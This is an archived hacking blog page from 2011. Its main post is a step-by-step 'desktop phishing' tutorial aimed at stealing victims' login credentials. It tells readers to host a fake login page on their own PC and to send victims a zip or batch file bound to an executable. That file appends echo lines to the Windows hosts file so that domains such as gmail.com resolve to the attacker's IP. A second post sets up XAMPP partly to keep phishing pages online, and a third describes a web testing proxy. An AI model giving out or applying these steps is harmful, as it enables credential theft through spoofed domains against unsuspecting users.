Green Hackerz: April 2011

Desktop Phishing Tutorial - Step By Step Explained

Posted by GreenHackerz Tags Hacking, Internet, Phishing, Tutorial, Windows 7, Windows XP

It is an Advance Form of PHISHING. If You want to read the Basics of Normal PHISHING Then you can read my Previous Article on PHISHING from HERE .
Difference between PHISHING & DESKTOP PHISHING are as Follows : ---

In PHISHING :-

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2.Victim enters his credentials in fake login page that goes to attacker
3.Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In DESKTOP PHISHING :-

1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.

2. Victim types the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.

3. Rest of the things are same as in normal phishing.

What is Hosts File ?

The hosts file is a text file containing domain names and IP address associated with them.

Location of hosts file in windows: C:\Windows\System32\drivers\etc\

Whenever we visit any website, say www.anything.com , an query is sent to Domain Name Server(DNS) to look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would

be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is attack ?

I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Two Steps to perform attack :-

1. Create and host phishing page on your computer.

2. Modify victim's host file

Step 1 :-

Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.

Kindly read my simple tutorial on setting up XAMPP webserver HERE and this step would be clear to you.

Step 2 :-

This step can performed in two different ways.

Method 1 :- Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.

Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

Method 2 - Create a batch file which would modify hosts file as per your need.

Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts

echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts

Obviously replace it with your IP and website acc. to yourself.

Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat

When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

Limitations of attack :-

1. Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.

2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-

Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure.

Happy Desktop Phishing @@@@@@

Setting Webserver- Host Webpages On Your Own Computer

Posted by Unknown Tags Internet, Operating System, Phishing, Tools, Tutorial, Windows 7, Windows XP

Have you ever wondered to setup a website without signing up at any web hosting site ? Learning web site designing and wanna keep testing how your web pages look? Free Web hosting sites removing you phishing pages ?

So solution to such kinda things is in this post. Basically we are going to turn our PC to a server.

What is a server ?

Server is we can say, any computer that is serving something . Like webserver serves webpages, ftp server serves files. Any computer can be turned into a server by simply installing a server software.

In this post,I am using XAMPP .

By installing this, contents of a particular directory of our computer would accessible all over internet . Means one could access those contents from any part of the world through our Public IP address.

You can place your web pages or whatever you wish in that directory.

Download XAMPP from HERE .

This package consists of Apache http server (A), MySQL database (M), php (P),Perl (P) and X represents cross platforms.

After dowloading it, simply install it .

At last stage on installation you will get this . Press 1 to start XAMPP control panel.

The control panel would look like this

Click Start to start apache server. Now lets check whether its working,

Open your web browser and visit your local machine address that is 127.0.0.1 or localhost. Hopefully you must get the XAMPP page as shown.

Now check whether it is accessible on internet. Type your Public/External Ip in your web browser and hit enter.

If you got a page as shown, follow the instructions :

1. Go to file httpd-xampp.conf

2. Remove "deny from all" and save the file.

3. Now restart the server and hopefully it would be all right now.

Now what ?

There must be a directory 'htdocs' at location C:\xampp\. The contents of this particular directory will be available to every body. Suppose you place a file anything.html in 'htdocs' directory. It would be accessible at

1.http://localhost/anything.html or http://127.0.0.1/anything.html

( Obviously above two links gonna work on your own computer only.)

2.http://xxx.xxx.xxx.xxx/anything.html (where xxx.xxx.xxx.xxx is your IP address)

You can start/stop this service simply through the control panel.

Thats all. And you have also use Filezilla(ftp server software) and Mysql (database) as per your need.

Get a domain name ?
Now you would want to get a domain name instead of using the Public IP to check out your contents.
But how can we get a domain name because our IP is dynamic and to which IP domain name would point ?
Dont worry, we have a solution.
1. Log on to www.no-ip.com and sign up for an account. Choose available domain name.
2. Download their dynamic DNS update client and run on PC.

This client would automatically keep updating your dynamic IP address and that is how the selected domain would always be pointing to your IP address.

Note: You might need do port forwarding if you are behind a router. Kindly mention the queries regarding that in comments.

EnJoy Friends @@@

CAT - Web Application Security Test & Assessment Tool

Posted by Karan Singh Rajawat Tags Tools, Tutorial

CAT is designed to facilitate manual web application penetration testing for more complex, Demanding Application testing tasks. It removes some of the more repetitive elements of the testing process, allowing the tester to focus on individual applications, thus enabling them to conduct a much more thorough test. Conceptually it is similar to other proxies available both commercially and open source, but CAT provides a richer feature set and greater performance, combined with a more intuitive user interface.

There are a number of differences between CAT and currently available web proxies. They include:

CAT uses Internet Explorer’s rendering engine for accurate HTML representation
It supports many different types of text conversions including: URL, Base64, Hex, Unicode, HTML/XML, SQL and JavaScript no quotes
It offers integrated SQL Injection and XSS Detection
Synchronized Proxies for Authentication and Authorisation checking
Faster performance due to HTTP connection caching
SSL Version and Cipher checker using OpenSSL
Greater flexibility for importing/exporting logs and saving projects
Tabbed Interface allows for multiple tools at once e.g. multiple repeaters & different logs
The ability to repeat and modify a sequence of requests (particularly useful in SSO testing)
It’s free!